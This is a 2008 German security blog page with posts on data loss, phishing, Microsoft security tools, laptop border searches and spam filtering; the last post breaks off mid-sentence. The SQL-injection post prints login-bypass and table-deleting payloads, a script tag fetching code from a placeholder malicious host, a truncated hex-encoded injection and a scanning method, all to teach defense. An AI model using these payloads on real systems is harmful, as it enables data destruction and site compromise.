Wohin mit sensiblen Daten? Friday, August 22, 2008 8:56 PM Toni Pohl Heute wurde bekannt, dass in Großbritannien "sensible Daten" abhanden gekommen sind. Diese Daten waren anscheinend auf einem USB-Stick kopiert worden und - schwupps - verlegt, verloren, gestohlen oder sind im besten Fall einfach weg. Es handelt sich dabei um Namen und Geburtsdaten aller 84-tausen Häfltinge von England und Wales und die Adressen von 33-tausend straffälligen Wiederholungstätern, so berichtet auch der ORF.Dies ist in letzter Zeit in Good Old Britain bereits mehrfach vorgekommen: Es wurden Regierungsdaten, Notebooks, Disketten und CDs in Zügen vergessen, die Daten von 25-Millionen Steuerzahlern verloren und ein paar weitere peinliche Fauxpas. Solche Fälle passieren im elektronischen Zeitalter natürlich immer und überall - oft werden derartige Mitteilungen aber kaum oder erst viel später publik. Es genügt halt nicht, sich in (Firmen-) Netzwerken nur darum zu kümmern, dass eine Firewall und Netzwerk-Security vorhanden sind. Genauso wichtig sind Schulungen und Maßnahmen, um das Bewusstsein der Mitarbeiter zu schärfen, wie mit Daten umgegangen wird! Wenn Regeln vorhanden und Mitarbeiter geschult sind, Datenschutzbeauftrage definiert sind, stellen sich folgende Fragen: Wohin mit (sensiblen) Daten? Wie sollen Daten transportiert und wie archiviert werden? Experten raten dazu, sensible Daten gar nicht zu transportieren - zumindestens nicht "sorglos". Der Vorteil von elektronischen Daten, dass diese beliebig oft kopierbar sind, sind sicherheitstechnisch gesehen ein Nachteil. Also möglichst kein Kopieren UND Transportieren auf USB-Sticks, CD´s und Bänder! Kopieren zum Zweck der Archivierung ist aber natürlich Pflicht. Diese Daten gehören dann auch nur in den Firmen-Safe oder auf einen entfernten Server gesichert oder an einem zweiten, sicheren Ort aufbewahrt. Wenn Daten schon transportiert werden, dann ist es zumindest ratsam, diese (sensible) Daten zu verschlüsseln. Der Nachteil: wenn man als Anwender im Besitz der Datenträger ist, hat man meistens auch viel Zeit und Möglichkeiten, die Daten wieder zu entschlüsseln. Wie auch die "Datenschützer" fordern, ist es beunruhigend und wohl kaum nachvollziehbar, wo eigene, persönliche Daten gespeichert sind. Genauso wenig weiß niemand, ob und wo "verlorene" Daten von fremden Personen benutzt werden. Generell gilt aber: Besser ist, sensible Daten nicht selbst zu transportieren und per VPN darauf zuzugreifen (siehe auch Reisen mit einem Notebook). Was meinen Sie dazu? Welche Arten von Daten halten Sie für sensibel?Wie transportieren und schützen Sie wichtige Daten? Welche Verschlüsselungstechnologien setzen Sie ein?Wie merken Sie sich Ihre dutzende/hunderte Passwörter?Wir freuen uns auf Ihre Kommentare mit Tipps und Feedbacks! Beitrag von Toni Pohl General | Security Mediumlink | Permalink | Comments (0) | Post RSS mehr
Phishing? Passiert mir nicht! Mir doch nicht! Tuesday, August 19, 2008 10:01 PM Martina Grom ....dachte ich bisher - und so ist es auch bisher. Bisher. Denn wenn man so wie ich viel im Web unterwegs ist, viel mit Messenger arbeitet, viele E-Mails kriegt, kurz und gut, so richtig im Information Overflow treibt, kann es schon mal passieren. Sollte es aber nicht. So wie unlängst zwei lieben Kollegen von mir. Plötzlich wird im gerade offenen Messenger Fenster ein Link geschickt. Man klickt drauf, handelt es sich ja um die Person des Vertrauens. Und wundert sich ein bisschen über die Seite. Der Kollege kriegt genau den gleichen Link, da wir ja alle sooooo multi-tasking fähig sind, chatten wir ja parallel. Ich murmle noch Panama, weil ich mich über die Nutzungsbedingungen wundere, mein Gegenüber zieht daraus aber folgende Schlüsse: Freundin war in Panama auf Urlaub - Panama - Seite mit Bildern = Urlaubsbilder. Und schon ist er angemeldet, leider zu spät wird mein nächstes Murmeln gehört: das ist sicher eine Phishing Site. Tja, es hätte theoretisch ja schlimmer sein können, es waren ja "nur" die Messenger Daten. Nur mal kurz alle (dreihundertmillionen) Kennwörter ändern. Und sich etwas blöd vorkommen. Und sich wieder Mal vor Augen führen: wachsam zu bleiben. Hier noch ein paar Infos zu oben beschriebener Falle. Mich würde an dieser Stelle von unseren Lesern interessieren: wem ist es schon mal ähnlich gegangen? Beitrag von Martina Grom Microsoft | Security Mediumlink | Permalink | Comments (0) | Post RSS mehr
Kostenloses Anti-Virus-Zeugs Saturday, August 16, 2008 4:59 PM Toni Pohl Für Privat-Anwender gibt es (zum Glück) mittlerweile eine Reihe von kostenlosen Virensuch- und Virenschutz-Programmen. Jörg Klemenz hat sich die Mühe gemacht, in seinem Blog C-Ko einige davon aufzuspüren (wie zum Beispiel Avast) und diese zu beschrieben und mit Links zu versehen. Sehen Sie am besten selbst im Blog hier: http://c-ko.blogspot.com/2007/02/kostenloses-anti-virus-zeugs.html General | Security | Tools Mediumlink | Permalink | Comments (0) | Post RSS mehr
Tool gegen SQL Injection Monday, July 7, 2008 10:45 AM Toni Pohl Seit Ende Juni gibt es eine Hilfe für Entwickler und IT-Administratoren gegen SQL Injection in Websites vom Typ classic asp und zwar den Microsoft Source Code Analyzer for SQL Injection - June 2008 CTP (siehe auch Beitrag Totgesagte leben länger - so auch SQL-Injection). Das Tool benötigt das Microsoft .Net 3.0 Framework und ist ein Command line-Utility. Nach Entpacken des Download-Pakets empfiehlt sich daher ein erster Blick in Readme.html. Um eine einzelne asp-Seite zu prüfen, wird diese einfach mit dem /Input-Parameter aufgerufen: msscasi_asp.exe /Input=C:\wwwroot\myweb\login.asp Das Ergebnis könnte dann beispielsweise so aussehen: Microsoft (R) Source Code Analyzer for SQL Injection Version 1.3.30601.30622Copyright (C) Microsoft Corporation. All rights reserved. RESULT has no typeC:\wwwroot\myweb\shopfunc.asp(600) : warning C80420: Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as THEGUID`591). Path summary:- {THEGUID}[THEGUID`591 : string_input] created on 'Parameter' (line 591)- {THEGUID}[THEGUID`591 : string_input] to {SQL, THEGUID}[THEGUID`591 : string_input] on 'Transfer' (line 599)- {SQL, THEGUID}[THEGUID`591 : string_input] to {SQL, THEGUID}[THEGUID`591 : $error] on 'Execute' (line 600): Lines: 591, 596, 599, 600 C:\wwwroot\myweb\shopfunc.asp(833) : warning C80420: Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as TABID`825).There are other instances of this error:Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as TABID`825).(line 843) ...etc. In dieser geprüften Seite werden also einige Meldungen ausgeworfen - Handlungsbedarf für den Entwickler. Das Tool kennt sechs Fehler: 80400, 80403, 80406, 80407, 80420 or 80421, wobei 80400-Warnungen die höchste Priorität besitzen und sofort behoben werden sollten. Wenn keine Meldungen ausgegeben werden, ist die Seite in Ordnung: msscasi_asp.exe /Input=C:\wwwroot\myweb\datefunc.asp Microsoft (R) Source Code Analyzer for SQL Injection Version 1.3.30601.30622Copyright (C) Microsoft Corporation. All rights reserved. Weitere Schritte (und wie ganze Websites geprüft werden können) finden Sie in Getting started with Microsoft Source Code Analyzer for SQL Injection. Das Tool ist somit eine einfache Hilfe für den Security-Check von ASP-Websites. Beitrag von Toni Pohl Developer | Microsoft | Security | Tools Mediumlink | Permalink | Comments (0) | Post RSS mehr
Für IT Professionals und solche, die es werden soll(t)en: Microsoft Baseline Security Analyzer 2.1 Monday, June 30, 2008 5:45 PM Toni Pohl Schon ein Monat ist er alt - aber vielen (noch) unbekannt: Der Microsoft Baseline Security Analyzer 2.1 für Windows (MBSA). MBSA ist ein einfaches, kostenfreies Tool, welches ermöglicht den Sicherheitsstatus eines Windows-PCs anhand der Sicherheitsempfehlungen von Microsoft zu ermitteln. Dabei können übliche Schwachstellen und fehlende Patches entdeckt und die Systemsicherheit verbessert werden. MBSA ist vor allem für KMUs gedacht. Der Analyzer kann mit und ohne WSUS arbeiten. Das Tool enthält ein grafisches und ein Commandline-Interface und kann auch Remote Scans ausführen (also fremde PCs prüfen). MBSA 2.1 läuft ab Windows 2000 Service Pack 3 bis hin zum neuen Windows Server 2008, als x32 oder x64bit Applikation - je nach Betriebssystem gibt es mitunter einige Einschränkungen. Was ist neu an MBSA 2.1? Die neue Version unterstützt den aktuellen Windows Update Agent client (WUA - von Microsoft Update oder WSUS-Servern installiert), ebenso ein neues grafisches Interface für Vista und Windows Server 2008, vollen 64bit-Support, vulnerability assessment check support (VA - ja, was wär das Leben ohne tolle Abkürzungen?) und aktualisierte Checks für SQL Server 2005 und Windows XP Embedded platforms. Nach der Installation (als Administrator!) erfolgt die Überprüfung in einfachen Schritten: Das Ergebnis sieht dann beispielsweise so aus: Ein leicht zu lesender Report, der die einzelnen Themen übersichtlich zusammenfasst und zu jedem Thema Hinweise zur Überprüfung, zu den ermittelten Details und teilweise auch Links zur Behebung der Schwachstelle liefert. Beim Anklicken eines Links wird der entsprechende Report im Browser geöffnet. Hier geht es zum Download und zu den wirklich ausführlichen FAQs. Ein brauchbares Tool! Wir wünschen Secure Computing! Beitrag von Toni Pohl Microsoft | Security | Tools Mediumlink | Permalink | Comments (0) | Post RSS mehr
Forefront: On demand Webcasts Sunday, June 22, 2008 9:27 AM Martina Grom Zur Forefront Familie stehen eine Reihe von Webcasts zur Verfügung, die teilweise bereits stattgefunden haben und deshalb on Demand abrufbar sind. In der Zusammenstellung sind jedoch auch Webcasts angeführt, welche noch stattfinden werden, diese sind mit einem * gekennzeichnet. Forefront Client Security Forefront Server Security Forefront Edge Security Forefront Stirling Sicherheit Allgemein Forefront Client Security: TechNet Webcast: Forefront Client Security Series: A Technical Overview of Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366183&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security (Part 1 of 2) (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366185&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security (Part 2 of 2) (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366194&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security in Large Enterprises (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366204&culture=en-US TechNet Webcast: Troubleshooting Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032343644&culture=en-US TechNet Webcast: How Microsoft IT Uses Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366695&culture=en-US Forefront Server Security: TechNet Webcast: Technical Overview of Forefront Security for Exchange Server (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032348784&culture=en-US TechNet Webcast: Forefront Security for Exchange Deployment Best Practices (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377121&culture=en-US TechNet Webcast: Technical Overview of Forefront Security for SharePoint (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338141&culture=en-US TechNet Webcast: Forefront Security for SharePoint Content Filtering Drill-Down (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377096&culture=en-US TechNet Webcast: Securing SharePoint End-to-End with Microsoft Forefront (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377264&culture=en-US TechNet Webcast: Managing Exchange Server and SharePoint Protection with Forefront Server Security Management Console (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377108&culture=en-US TechNet Webcast: A Technical Introduction to Forefront Security for Communications Server (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377127&culture=en-US TechNet Webcast: Technical Overview of Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338266&culture=en-US TechNet Webcast: Take Control with Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032326211&culture=en-US TechNet Webcast: Managing Messaging and Collaboration Security with the Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032352492&culture=en-US TechNet Webcast: Maximizing the Multiple Scan Engine Advantage in Forefront Server Security Solutions (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032341210&culture=en-US TechNet Webcast: 24 Hours of Exchange Server 2007 (Part 13 of 24): Maintaining Anti-Spam Systems (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032323323&culture=en-US TechNet Webcast: 24 Hours of Exchange Server 2007 (Part 14 of 24): Maintaining Antivirus (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032323327&culture=en-US Forefront Edge Security: TechNet Webcast: ISA Server 2006 Technical Overview (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032334107&culture=en-US TechNet Webcast: ISA Server 2006 Firewall and Proxy Services (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032334394&culture=en-US TechNet Webcast: Cool and Under-Utilized ISA 2006 Scenarios (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377117&culture=en-US TechNet Webcast: Overview of Forefront Edge Secure Access Technologies (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338274&culture=en-US Forefront Stirling: TechNet Webcast: Forefront Code Name "Stirling" Technical Overview (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377102&culture=en-US Sicherheit Allgemein: TechNet Webcast: Microsoft Malware Protection Center Overview (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032340082&culture=en-US Comprehensive protection for your client operating system, application servers, and the network edge http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032346757&culture=en-US Microsoft Webcast: Security Series (Part 5 of 8): Protecting Data from Malicious Software (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032336307&culture=en-US TechNet Webcast: How Microsoft IT Uses Network Access Protection to Manage Network Health (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032339511&culture=en-US TechNet Webcast: How Microsoft IT Defends Against Spam, Viruses, and E-Mail Attacks (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032305763&culture=en-US TechNet Webcast: Security Features in Windows Vista (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032312729&culture=en-US Ebenso wert vorbei zu schauen: Forefront Website. Auf dieser Website werden auch gratis Testversionen der Produkte angeboten. Es stehen Evaluierungskopien (was für ein schönes eingedeutschtes Wort) für Exchange, Sharepoint, Client Security, und ISA Server zur Verfügung. Alternativ kann man an einem virtual Lab teilnehmen. Beitrag von Martina Grom Microsoft | Security Mediumlink | Permalink | Comments (0) | Post RSS mehr
Notebook = Koffer oder: Reisen mit einem Notebook Tuesday, June 17, 2008 11:05 AM Toni Pohl Mittlerweile hat fast jeder von uns sein Notebook auf Reisen dabei. Für den Business-Termin, für das Speichern der vielen Urlaubsfotos oder nur für die Kommunikation. Bei Einreise in die USA (und wahrscheinlich demnächst auch in andere Staaten) dürfen die Daten eines Notebooks durchsucht werden! Das ist schon seit längerem üblich und ist laut Entscheidung eines Berufungsgerichtes in den USA "mit dem Öffnen von Gepäckstücken gleichzusetzen". Das bedeutet, dass ein Zollbeamter verlangen kann, beispielsweise Browser-Cache und Mails anzuschauen, Dateien durchzusehen oder im schlimmsten Fall das Notebook zur weiteren Untersuchung zu konfiszieren (und erst nach Stunden wieder zurück zu kommen). Sehr oft werden Festplatten auch nach Fotos durchsucht, vor allem nach kinderpornografischem Material. Es sieht so aus, als wären die USA derzeit mehr daran interessiert, nach Fotos und Geschäftsdaten Ausschau zu halten als nach Terroristen. Nachdem die Verfahren nicht standardisiert sind, wird das Durchsuchen oft mit "security by curiosity" verglichen. Auch wenn man im Regelfall meist keine heiklen Daten mit sich führt - es kann schon unangenehm sein, wenn der eigene E-Mail-Verkehr, Urlaubsfotos oder auch Geschäftsdaten offen gelegt werden müssen. Und einem Zöllner erklären, dass die E-Mail an den Freund in Amerika über den US-Wahlkampf, Politik oder sonstigen versendeten Funstuff ironisch gemeint war... Der Rat von Experten lautet: Sensible Daten nicht verschlüsseln (denn das erweckt automatisch Verdacht), sondern diese in anderen, unscheinbaren Dateien zu verstecken, beispielsweise Inhalte an eine andere Datei anzuhängen (Alternate Data Streams). Am besten ist es, sensible Daten einfach nicht mitzuführen, sondern auf diese Remote (VPN) zuzugreifen. Siehe dazu auch die ORF Futurezone US-Flughäfen: Laptops als Datenkoffer Beitrag von Toni Pohl General | Security Mediumlink | Permalink | Comments (0) | Post RSS mehr
Totgesagte leben länger - so auch SQL-Injection Thursday, June 5, 2008 5:20 PM Toni Pohl Die guten alten Zeiten - da war alles noch einfacher. Oder doch nicht? Ich habe mal an einem größeren Shop-System programmiert - das war im Jahr 2000 - und dabei gelernt, dass man einige Dinge beachten muss: Funktionalität, Usability und ... Security. Ein SQL-Server-System ist ja eine feine Sache, aber es könnte dazu benutzt werden, um "bösen" SQL-Code abzusetzen - wenn man nicht ein paar grundlegende Dinge berücksichtigt. Die Bezeichnung "SQL-Injection" bedeutet, dass Eingaben (meist durch Webformulare oder präparierte URLs) um syntaktisch korrekte SQL-Befehle erweitert werden, sodass von Außen bösartiger Code eingeschleust werden kann, der Daten ändert oder löscht. Warum ist SQL Injection jetzt (noch) ein Thema? Es gab in den letzten Wochen und Monaten einige Mitteilungen, dass Systeme mit IIS und SQL Server durch SQL Injection verwundbar seien. Diese sind schlichtweg - falsch! Es handelt sich bei diesen Attacken nicht um Schwachstellen von Windows oder IIS oder SQL Server, sondern um Fehler von Software-Lieferanten oder Entwicklern. Damit Applikationen durch SQL Injection verwundbar sind, müssen die folgenden Voraussetzungen zutreffen: Websites und Applikationen, welche Classic ASP (oder auch PHP, od. ASPX) verwenden, die SQL Server (oder ähnliche SQL-Datenbanksysteme wie Oracle, MySQL, etc.) verwenden und SQL-Befehle ungefiltert zusammensetzen und ausführen (siehe Beispiel unten). Die Verantwortung für die Softwarelösungen liegt beim Entwickler selbst!Und hier herrscht leider immer noch viel zu wenig Focus von Software-Entwicklern im Bereich Security, denn sonst wären solche Attacken gegen Webseitensysteme nicht mehr erfolgreich! Wie funktioniert SQL-Injection? Auch darüber ist schon viel berichtet worden, hier ein einfaches Beispiel zur Funktionsweise. Angenommen, es gibt auf einer Webseite eine Login-Seite: Diese verwendet die Texteingaben ungefiltert und baut daraus einen SQL-String zusammen, welcher gegen die Datenbank abgesetzt wird: SELECT * FROM Users WHERE Username = 'max' and Password = 'geheim' Das schaut soweit ja fürs Erste funktionell aus - und als Ergebnis werden alle Datensätze mit diesem Filter geliefert - im Idealfall ein Datensatz mit dem User Max, wo sein Kennwort geheim ist. Max wird dann angemeldet und ... zurück zum Start! Ein findiger, böser Mensch kann nun folgendes versuchen: in der Annahme, dass die User-Abfrage so (oder ähnlich) funktioniert, kann er nun in die Textfelder folgendes schreiben: ' or '1'='1 und dasselbe beim Passwort. Was kommt beim Zusammensetzen des SQL-Befehls in der Login-Seite raus? SELECT * FROM Users WHERE Username = '' or '1'='1' and Password = '' or '1'='1' Die Texteingaben werden in das SQL eingesetzt und liefern somit immer WAHR. Und was liefert diese Abfrage? ALLE Benutzer aus der Users-Tabelle. Das bedeutet zum Beispiel, dass (bei einer Login-Seite) der anonyme Benutzer gleich als erster User in der Tabelle angemeldet wird. Blöd. Noch blöder: Wenn der Angreifer sich nicht damit begnügt, sondern dahinter noch ein böses SQL absetzt: 1'='1';DELETE FROM Users; Ganz schlecht. Damit wird beim Ausführen der Abfrage die ganze Users-Tabelle gelöscht. Dumm gelaufen - für den Betreiber der Website. Optimierung von SQL Injection Eine weitere Variante - diese ist ganz aktuell aus einem Logfile einer Website entnommen, die mit SQL Injection bearbeitet wurde: Statt od. zusätzlich zur Bedingung wird ein Script eingesetzt, welches aufgerufen wird, wenn die Tabelle ausgelesen und in einer Website angezeigt wird: <script src="http://www.---boeseseite---.com/b.js"></script> Und hier drinnen gehts dann mit Javascript weiter... die aufrufende Seite wird zur Umleitung oder (im besten Fall) unbrauchbar. Suchen Sie mal im Web nach "banner82.com" oder "adw95.com" - dann finden Sie ziemlich viele (auch prominente) Websites, die durch die aktuellen SQL-Injection-Angriffe "ge-hackt" wurden und diese Scripts intus haben oder hatten. Hier ein Beispiel, wie so eine infizierte Seite dann aussehen kann: Hier sind viele Attacken ausgeführt worden, sodass das Script mehrfach injiziert wurde und teilweise wieder unbrauchbar wird. Noch ein Hinweis zu banner82: Diese Attacke wird nicht ganz im Klartext injiziert, sondern kommt in etwa so daher: DECLARE @S%20VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641 ..... 6F7220 AS VARCHAR(4000)); EXEC(@S) Das SQL wird in einer Variable zusammengebastelt, lädt alle Tabellen und Spaltennamen in einer Schleife und versucht, das Script überall hineinzuschreiben und wird am Schluss mit EXECute ausgeführt. Eine weitere Steigerung: Mittlerweile ist es nicht mehr so, dass ein Hacker manuell versucht, in die Datenbank einer Website zu einzudringen, sondern die Angriffe werden automatisiert. Dazu bietet sich zum Beispiel an, ein API von Google od. einer anderen Suchmaschine zu benutzen: Suche alle Sites, wo Parameter (z.B. http://www.--eineseite--/article?id=xyz) übergeben werden.Versuche, an den Parameter ein ' anzufügen.Analysiere die Response der Seite, ob der gesendete Parameter korrektes Encoding besitzt. Wenn nein, dann ist die Website "offen" und ein Kandidat für SQL-Injection-Scripts! Schutz vor SQL Injection Die Lösung: Es gibt für alle Entwickler eine einfache Regel: All input is evil! Jede Eingabe muss vom Programm gefiltert oder kontrolliert werden. Das bedeutet: Keine SQL-Befehle mehr aus Eingabefeldern zusammensetzen. Auch schon in ADO (Classic ASP) gab es Parameter-Übergabe, natürlich auch in ASP.NET. Diese verhindert, dass Texteingaben ungültige Zeichen enthalten und somit bösartige SQL-Befehle ausführen können! Aus der Demo-Abfrage von oben wird: select TOP (1) UserID from Users where username = @username and password = @password und @username und @password werden als Parameter übergeben. In ASP.NET 2.0 (VB.NET) sieht das dann beispielsweise so aus: Dim conn As SqlConnectionDim cmd As New SqlCommandconn = New SqlConnection(ConnectionStrings("conn").ConnectionString)conn.Open()cmd = New SqlCommand(SQL, conn)cmd.CommandType = CommandType.Text ' od besser: .StoredProcedurecmd.Parameters.AddWithValue("@username", Me.txtUsername.Text)cmd.Parameters.AddWithValue("@password", Me.txtPassword.Text)UserID = cmd.ExecuteScalar()conn.Close() und schon hat SQL-Injection dank der Parameter-Übergabe keine Chance mehr. Das Ganze noch in einen Try..Catch Block, mit etwas Fehlerabsicherung versehen und man hat sauberen, sicheren Code (Hardcore-Entwickler mögen mir verzeihen - ich weiß, der Code kann effizienter formuliert werden aber das Beispiel dient nur zur Demonstration). Ziel dieses Artikels ist, das Bewußtsein zu diesem (eigentlich sehr alten) Thema zu fördern, die Funktionsweise zu demonstrieren und Entwickler anzuhalten, ihre Software sicher zu programmieren, damit keine mißbräuchliche Verwendung von öffentlich zugänglichen Webseiten möglich ist. Es gibt dazu eine Fülle von Anleitungen und Hilfen. Viel mehr zu diesem Thema und weitere Hilfestellung, wie man sich davor schützen kann, finden Sie in den folgenden Links: http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx - Microsoft´s call to action und weitere Infos: http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx - Scott Guthrie´s blog http://msdn.microsoft.com/en-us/library/ms998271.aspx - msdn: How To: Protect From SQL Injection in ASP.NET http://msdn.microsoft.com/en-us/library/bb671351.aspx - msdn: Explained - SQL Injection http://technet.microsoft.com/de-de/library/ms161953.aspx - technet: SQL Injection http://msdn.microsoft.com/en-us/library/aa224806.aspx - Injection Protection Achja, es gibt natürlich auch zum Thema Programmieren im Internet einige weitere interessante Security-Themen: SQL Cross Site Scripting, Canonicalization Attacks (wußten Sie, wie viele Arten es gibt, eine URL anzugeben, zum Beispiel auch dezimal), Query String, Form, Cookie, HTTP Header-Manipulations und vieles mehr. Internet-Technologie ist toll, aber bietet eine Reihe von Angriffsmöglichkeiten. Bei Tauchern heißt der Abschiedsgruß "Gut Luft". Bei Entwicklern sollte es heißen "Secure coding"! ;-) Beitrag von Toni Pohl Developer | Microsoft | Security Mediumlink | Permalink | Comments (0) | Post RSS mehr
Microsoft Patchday und Security Bulletins Thursday, May 15, 2008 9:30 AM Toni Pohl Wahrscheinlich ist nur wenigen Administratoren bekannt, dass es im Microsoft TechNet eine Reihe von Informationen und Services gibt, welche über Patches, gestopfte Sicherheitslücken, Tools und Empfehlungen berichten. Das wird hiermit nachgeholt. ;-) Im Thema Sicherheit findet sich die Einstiegsseite Security Bulletin-Suche. Hier findet sich beispielsweise auch der Bulletin vom Mai 2008 - diesmal wurden drei als kritische Sicherheitslöcher und eines als mittleres Sicherheitsloch eingestuft und behoben. Empfehlenswert für System-Admins ist auch der Microsoft Security Bulletins RSS-Feed. Für Betreiber von MU, WU und WSUS finden sich in KB894199 Informationen über Änderungen dieser Dienste im Jahr 2008. Links: http://www.microsoft.com/germany/technet/sicherheit/bulletins/aktuell/default.mspx - Start http://www.microsoft.com/germany/technet/sicherheit/bulletins/ms08-may.mspx - aktuell im Mai http://www.microsoft.com/germany/technet/sicherheit/bulletins/secrss.xml - der RSS-Feed http://support.microsoft.com/kb/894199 - MU, WU und WSUS Änderungen 2008 http://www.microsoft.com/germany/technet/sicherheit/default.mspx - Allgemeine Infos zum Them Sicherheit mit Tools zum Netzwerk-Schutz Beitrag von Toni Pohl Microsoft | Security Mediumlink | Permalink | Comments (0) | Post RSS mehr
Windows XP SP3 ist (offiziell) da! Wednesday, May 7, 2008 1:42 PM Toni Pohl Es hätte eigentlich schon bis Ende April veröffentlicht werden sollen - aber nun ist es wirklich da: Das "letzte" Service-Pack für Windows XP: ServicePack 3. Grund für die Verzögerung waren Kompatibilitätsprobleme mit dem eigenen Microsoft Dynamics Produkten. Diese wurden in SP3 nun behoben. Das Whitepaper Windows XP Service Pack 3 Overview informiert über die Neuerungen. Enthalten sind u.a. Security-Patches für Web und Office-Applikationen. Es wurde die Produktaktivierung von Windows Vista und Windows Server 2003 SP2 hinzugefügt. Windows XP kann jetzt ohne Produktschlüssel installiert werden und für einen begrenzten Zeitraum laufen. Der Produktschlüssel kann dann später durch das "Genuine Advantage-Programm" eingegeben werden. Windows XP SP3 stellt auch sicher, dass alle verfügbaren Updates installiert sind und darüber hinaus einige neue Fähigkeiten von Windows Server 2008 genutzt werden können, wie etwa der Netzwerkzugriffsschutz Network Access Protection (NAP). Auch wurde Wi-Fi Protected Access 2 Unterstützung (WPA2) hinzugefügt. Durch das Peer Name Resolution Protocol 2.1 können XP-Computer über PNRP mit Vista-Rechnern kommunizieren, RDP 6.1 wird hinzugefügt. Neu kommen auch MMC 3.0, Windows Installer 3.1 sowie einige Verbesserungen in BITS 2.5, IPSec, Kryptografiemodulen und weitere Updates hinzu. IE7 ist nicht standardmäßig enthalten und als Update zum Download verfügbar. Windows XP Service Pack 3 enthält alle zuvor veröffentlichten Windows XP-Updates, einschließlich Sicherheitsupdates und Hotfixes. Hier gehts zum Download für x86 Systeme (etwa 313MB): Windows XP Service Pack 3 Beitrag von Toni Pohl Microsoft | Security Mediumlink | Permalink | Comments (0) | Post RSS mehr
Der ultimative Viren-Scanner Thursday, April 10, 2008 7:36 AM Martina Grom Für Nicht-kommerziellen-Home-Use gibt es eine Reihe von Empfehlungen für den Virenscanner avast. avast des tschechischen Software-Herstellers ALWIL besitzt eine integrierte Anti-Spyware, Anti-Rootkit und eine Selbstschutzfunktion. Das Setup ist sehr einfach und das look & feel ansprechend - sprich einen Tipp wert! avast kann bis zu 60 Tage lang getestet werden, für die private Benutzung zu Hause ist danach nur eine Online-Registrierung nötig. Siehe auch die Artikel in Vistablog und WinFuture. Hier gehts zur Download-Seite von avast Home. General | Security | Tools Mediumlink | Permalink | Comments (0) | Post RSS mehr
Exchange Hosted Filtering - Effiziente Spamabwehr Monday, March 24, 2008 10:27 AM Martina Grom Wie bereits im Artikel über Greylisting und seine Auswirkungen auf manche Exchange 2003 Systeme angekündigt, hier ein paar nützliche Informationen zu einem neuen Service, welches von Microsoft angeboten wird: Exchange Hosted Filtering. Spam und seine Vermeidung gehört mittlerweile zu einem Lieblingsthema von mir. Mit Erstaunen stelle ich immer wieder fest, wie abhängig wir uns vom Medium E-Mail machen und dabei in Kauf nehmen, dass unsere E-Mails nicht ankommen, in einem Schwall von Junk in einem Spamordner versinken, wir täglich viel Zeit damit verbringen, Mails auszusortieren, unsere Handys mit Push E-Mail Funktionen verwenden um nur ja nix zu verpassen. Vor einigen Jahren, als das Thema richtig akut wurde, war ich eigentlich überzeugt davon, dass "man" (an wen habe ich damals bloß gedacht?) das Problem des Junks mit seinen ganzen Auswirkungen in den Griff bekommen wird. Damals hatten wir noch herzige Spamraten von 30%, vielleicht 40%. Im Nachhinein betrachtet richtig süß. Jetzt kämpfen wir mit 95%, manchmal mehr. Und trotzdem ist das Medium E-Mail noch immer überall präsent. Zurück zum Thema, es soll ja nicht untechnisch werden. :-) Microsoft hat in seine aktuellen Exchange Versionen (mit aktuell meine ich Exchange 2007 und Exchange 2003 SP2) bereits den Intelligent Message Filter (IMF) integriert. Wer ihn nicht kennt: unbedingt anwerfen und in Betrieb nehmen, es lohnt sich! Der IMF arbeitet ähnlich wie der Junk E-Mail Filter von Outlook (seit Version 2003 mit an Board), nur serverseitig. E-Mails werden am Server geprüft, der Administrator kann im IMF einstellen, welche E-Mails in den Mailboxen der User landen. Jene, die als Spam identifiziert werden, werden entweder archiviert oder gelöscht. Alleine durch die sinnvolle Integration von IMF sparen Sie sich und Ihren Usern viele Sortierereien. Mutige (so wie ich) löschen die ausgefilterten 